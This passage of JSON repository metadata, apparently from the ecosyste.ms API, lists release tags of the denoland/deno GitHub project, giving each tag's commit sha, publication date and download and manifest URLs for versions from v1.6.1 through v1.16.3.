o/tar.gz/v1.16.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3/manifests"},{"name":"v1.16.2","sha":"4836ab769c00c83b7c5488c4d9c5f185be858e70","kind":"commit","published_at":"2021-11-17T16:00:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"fdf890a68d3d54d40c766fd78faeccb20bd2e2c6","kind":"commit","published_at":"2021-11-11T10:59:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"1eae6c139ee1dac28df57d67d993792b773fa1ff","kind":"commit","published_at":"2021-11-09T12:55:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0/manifests"},{"name":"v1.15.3","sha":"f32f458318819088d59f58b7a4c05f0d28e41dff","kind":"commit","published_at":"2021-10-25T11:11:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3/manifests"},{"name":"v1.15.2","sha":"71da8140737a0ee81dd324e1156fd920a790c1cb","kind":"commit","published_at":"2021-10-18T19:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2/manifests"},{"name":"v1.15.1","sha":"b1d63aefd9f150ed3acbc3d0a6c2f51dadad3d17","kind":"commit","published_at":"2021-10-13T07:48:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1/manifests"},{"name":"v1.15.0","sha":"de3fa08d6cfac7edffb2411bbb42bb49af70dc82","kind":"commit","published_at":"2021-10-12T17:57:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0/manifests"},{"name":"v1.14.3","sha":"1b7d6809f649318a0fb6f0e241c25885538bbe25","kind":"commit","published_at":"2021-10-04T22:03:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3/manifests"},{"name":"v1.14.2","sha":"3ab682918a7cb9e23f8451eedb88074766d27049","kind":"commit","published_at":"2021-09-28T12:00:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2/manifests"},{"name":"v1.14.1","sha":"f27902e749fb3a78ca35a0dc41c9fc53cd2806e1","kind":"commit","published_at":"2021-09-21T22:44:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"f92cc66f0dbf8e9753f2e98d4469190f3b561eb0","kind":"commit","published_at":"2021-09-14T20:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0/manifests"},{"name":"v1.13.2","sha":"7b882cc05f02e9b09e9ec2856e37730ae947f509","kind":"commit","published_at":"2021-08-23T20:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2/manifests"},{"name":"v1.13.1","sha":"c67f6c13cd1de22e32f81723bc9224b8e2103a7a","kind":"commit","published_at":"2021-08-16T21:42:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"d82351d67784a2bcb5431ebb233abc727f673152","kind":"commit","published_at":"2021-08-10T14:22:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0/manifests"},{"name":"v1.12.2","sha":"dfba7a2b0197b05b3cb61724096111cc618aa747","kind":"commit","published_at":"2021-07-26T14:38:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"7d69f06db88cf022f2c5c6e0b04493af7b50a98b","kind":"commit","published_at":"2021-07-19T19:09:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"1ad6575028bd5a13eb0633cc5e7649e18deec556","kind":"commit","published_at":"2021-07-13T08:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0/manifests"},{"name":"v1.11.5","sha":"1e57081906fd2c504c0e4895681bdc7386c1956f","kind":"commit","published_at":"2021-07-02T15:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5/manifests"},{"name":"v1.11.4","sha":"ed16f4332263e81bf00a39ebc2200291b1fcbb8e","kind":"commit","published_at":"2021-07-01T11:57:51.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4/manifests"},{"name":"v1.11.3","sha":"f4bed1081456089559c82441a13c4fb700840cac","kind":"commit","published_at":"2021-06-29T16:43:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3/manifests"},{"name":"v1.11.2","sha":"2c0e482221cd86fdbdc055c76f1c214200419946","kind":"commit","published_at":"2021-06-21T15:47:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2/manifests"},{"name":"v1.11.1","sha":"d7ce3adc8b97ebca61c1f527ea0f9b842d0a2dbe","kind":"commit","published_at":"2021-06-15T21:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1/manifests"},{"name":"v1.11.0","sha":"b98293e21cb7e55def8fea2ca015381150d4cebf","kind":"commit","published_at":"2021-06-08T19:38:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0/manifests"},{"name":"v1.10.3","sha":"1567c1013cc8ff12cf039137792da66a1d0015b5","kind":"tag","published_at":"2021-05-31T20:22:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"232ec7798c5ee38e645c2aea31aea3e9a81e17f3","kind":"commit","published_at":"2021-05-17T15:28:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1cd1419e18386d512ab98849d132117182545b89","kind":"commit","published_at":"2021-05-12T03:11:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"57927781ed7eb8bb088d656768dc295716407c7a","kind":"commit","published_at":"2021-05-12T00:06:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0/manifests"},{"name":"v1.9.2","sha":"8074d8bcf3cdcc7e9a08df147e0082798a7c2760","kind":"commit","published_at":"2021-04-23T14:08:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"7760d9a669552e69211b101d4656662a3dddf8dd","kind":"commit","published_at":"2021-04-20T23:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"262ee78592209a1f8e449cfa1308dca9688a414e","kind":"commit","published_at":"2021-04-13T18:11:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0/manifests"},{"name":"v1.8.3","sha":"2e6b78be9095cc38c392e2477711ff6eec226704","kind":"commit","published_at":"2021-04-02T10:10:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3/manifests"},{"name":"v1.8.2","sha":"f50ed4e281e6c30120412271eb66a1fb67d1c63e","kind":"commit","published_at":"2021-03-21T20:12:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"8d3baa7777b6bd2a2631e1b87a4676b520f2b447","kind":"commit","published_at":"2021-03-09T20:55:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"18b894072d3eb6b04016e77ece0d78512f7ffca1","kind":"commit","published_at":"2021-03-02T23:23:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0/manifests"},{"name":"v1.7.5","sha":"e9669bf0656c2478416f6705ff218539dc42c126","kind":"commit","published_at":"2021-02-19T14:58:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5/manifests"},{"name":"v1.7.4","sha":"d2d7dc8d675d70f0061bdaf99ae4a08d84156aa9","kind":"commit","published_at":"2021-02-13T13:20:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4/manifests"},{"name":"v1.7.3","sha":"f67b06939be5b754ecee306e9da1d7c0779c3cd6","kind":"commit","published_at":"2021-02-12T16:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"647f11b3acc2f629a6d77836f5f6ef74ee10c4ce","kind":"commit","published_at":"2021-02-05T19:33:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1/manifests"},{"name":"std/0.85.0","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.85.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0/manifests"},{"name":"v1.7.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0/manifests"},{"name":"std/0.84.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.84.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0/manifests"},{"name":"v1.6.3","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3/manifests"},{"name":"std/0.83.0","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.83.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0/manifests"},{"name":"v1.6.2","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2/manifests"},{"name":"std/0.82.0","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.82.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0/manifests"},{"name":"v1.6.1","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1/manifests"},{"name":"std/0.81.0","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/